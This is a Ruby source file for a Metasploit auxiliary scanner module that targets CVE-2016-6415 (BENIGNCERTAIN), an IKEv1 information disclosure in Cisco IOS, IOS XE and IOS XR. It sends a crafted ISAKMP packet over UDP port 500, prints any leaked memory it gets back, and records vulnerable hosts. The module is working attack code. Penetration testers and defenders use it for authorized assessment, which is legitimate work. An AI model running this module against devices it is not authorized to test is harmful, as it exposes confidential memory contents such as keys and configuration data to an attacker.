GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
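class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Fixed ISAKMP header size (RFC 2408); the first payload's generic header
  # follows it, so that payload's 16-bit length field sits at bytes 30..31.
  ISAKMP_HEADER_LEN = 28
  # Replies at or below this size are ignored (original author's threshold:
  # "ISAKMP + 36 -> Notification Data").
  MIN_RESPONSE_LEN = 36
  # Number of trailing bytes compared to detect a reply that merely echoes the
  # probe packet instead of carrying leaked memory.
  ECHO_COMPARE_LEN = 2500
  # Seconds to wait for the single UDP reply.
  RESPONSE_TIMEOUT = 3

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco IKE Information Disclosure',
        'Description' => %q{
          A vulnerability in Internet Key Exchange version 1 (IKEv1) packet
          processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software
          could allow an unauthenticated, remote attacker to retrieve memory
          contents, which could lead to the disclosure of confidential information.

          The vulnerability is due to insufficient condition checks in the part
          of the code that handles IKEv1 security negotiation requests.
          An attacker could exploit this vulnerability by sending a crafted IKEv1
          packet to an affected device configured to accept IKEv1 security
          negotiation requests. A successful exploit could allow the attacker
          to retrieve memory contents, which could lead to the disclosure of
          confidential information.
        },
        'Author' => [ 'Nixawk' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2016-6415' ],
          [ 'URL', 'https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1' ],
          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2016-6415' ],
          [ 'URL', 'https://musalbas.com/2016/08/18/equation-group-benigncertain.html' ]
        ],
        'Notes' => {
          'AKA' => ['BENIGNCERTAIN'],
          'Stability' => UNKNOWN_STABILITY,
          'Reliability' => UNKNOWN_RELIABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        },
        'DisclosureDate' => '2016-09-29'
      )
    )

    register_options(
      [
        Opt::RPORT(500),
        OptPath.new('PACKETFILE',
                    [ true, 'The ISAKMP packet file', File.join(Msf::Config.data_directory, 'exploits', 'cve-2016-6415', 'sendpacket.raw') ])
      ]
    )
  end

  # Sends the stored ISAKMP probe to +ip+ over UDP and reports the host when
  # the reply carries a non-empty first payload, which this module treats as
  # the leak indicator. A reply whose tail merely repeats the probe is flagged
  # with a warning rather than trusted.
  #
  # Errors are no longer swallowed silently: connection-level failures are
  # logged at verbose level, anything else is printed as an error so a missing
  # or unreadable PACKETFILE does not masquerade as "not vulnerable".
  #
  # @param ip [String] target address supplied by the scanner mixin
  # @return [void]
  def run_host(ip)
    peer = "#{ip}:#{datastore['RPORT']}"
    udp_sock = nil

    # binread keeps the probe as raw bytes (ASCII-8BIT) so it can later be
    # compared byte-for-byte against the socket data.
    isakmp_pkt = File.binread(datastore['PACKETFILE'])

    udp_sock = Rex::Socket::Udp.create(
      {
        'Context' => { 'Msf' => framework, 'MsfExploit' => self }
      }
    )
    add_socket(udp_sock)

    udp_sock.sendto(isakmp_pkt, ip, datastore['RPORT'].to_i)
    res = udp_sock.get(RESPONSE_TIMEOUT)
    return unless res && res.length > MIN_RESPONSE_LEN

    # Convert non-printable characters to periods before showing the data.
    printable_data = res.gsub(/[^[:print:]]/, '.')
    vprint_status("Printable info leaked:\n#{printable_data}")

    return if first_payload_length(res).zero?

    print_good("#{peer} - IKE response with leak")
    report_leak(ip)

    # NETWORK may return the same packet data.
    print_warning("#{peer} - IKE response is same to payload data") if echoed_probe?(isakmp_pkt, res)
  rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::EHOSTUNREACH, ::Errno::ENETUNREACH => e
    vprint_error("#{peer} - #{e.class}: #{e.message}")
  rescue ::StandardError => e
    print_error("#{peer} - #{e.class}: #{e.message}")
  ensure
    # udp_sock stays nil if binread or socket creation raised; guard the close.
    udp_sock.close if udp_sock
  end

  private

  # Length field of the first ISAKMP payload: big-endian 16-bit at bytes 30..31.
  # The previous hex-string concatenation dropped leading zeros (e.g. 0x01,0x05
  # became 0x15); 'n' decodes the field correctly. Caller guarantees the slice exists.
  def first_payload_length(res)
    res[ISAKMP_HEADER_LEN + 2, 2].unpack('n').first
  end

  # True when the last ECHO_COMPARE_LEN bytes of +received+ equal those of +sent+.
  # Returns false when either side is too short, where the old slice arithmetic
  # produced nil and raised inside the silent rescue.
  def echoed_probe?(sent, received)
    return false if received.length < ECHO_COMPARE_LEN || sent.length < ECHO_COMPARE_LEN

    sent.b[-ECHO_COMPARE_LEN, ECHO_COMPARE_LEN] == received.b[-ECHO_COMPARE_LEN, ECHO_COMPARE_LEN]
  end

  # Records the finding in the database via the Report mixin.
  def report_leak(ip)
    report_vuln(
      host: ip,
      port: datastore['RPORT'],
      proto: 'udp',
      name: name,
      refs: references,
      info: 'Vulnerable to Cisco IKE Information Disclosure'
    )
  end
end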